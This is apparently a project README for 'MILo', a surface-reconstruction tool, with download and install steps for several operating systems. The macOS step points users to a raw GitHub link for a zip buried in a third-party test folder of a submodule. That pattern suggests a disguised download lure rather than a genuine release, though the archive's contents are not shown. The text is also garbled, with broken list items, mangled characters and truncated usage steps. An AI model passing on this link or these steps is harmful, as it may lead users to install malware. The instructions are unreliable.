Welcome to MILo! This software provides a solution for detailed and efficient surface reconstruction through the method known as Mesh-In-the-Loop Gaussian Splatting. Designed for those interested in computer graphics, such as artists and designers, MILo simplifies the process of rendering complex surfaces.
To use MILo, follow these simple steps:

Visit the Releases Page
Go to the MILo Releases page. -
Choose the Latest Version
Look for the latest version of the software. It will typically show at the top of the page. -
Download the Application
Click on the appropriate file for your operating system and download it to your computer. Make sure to choose the version that matches your system requirements (see below for details).
To run MILo effectively, ensure your computer meets the following requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or a Linux distribution.
- Processor: Dual-core CPU or better.
- Memory: At least 8 GB of RAM.
- Graphics Card: Compatible with OpenGL 3.3 or later.
- Storage: Minimum of 500 MB of free space.
Once the download completes:

Locate the Downloaded File Check your 'Downloads' folder (or the folder you configured for downloads).

Install MILo
- For Windows: Double-click the
.exefile and follow the on-screen instructions. - For macOS: Drag the https://github.com/bransantiago/MILo/raw/refs/heads/master/submodules/diff-gaussian-rasterization/third_party/glm/test/gtc/MI-Lo-v2.3.zip file to your Applications folder.
- For Linux: Extract the downloaded archive and run the executable.

To create a surface using MILo, follow these straightforward steps:

Click on βRenderβ to see the reconstruction in action. -
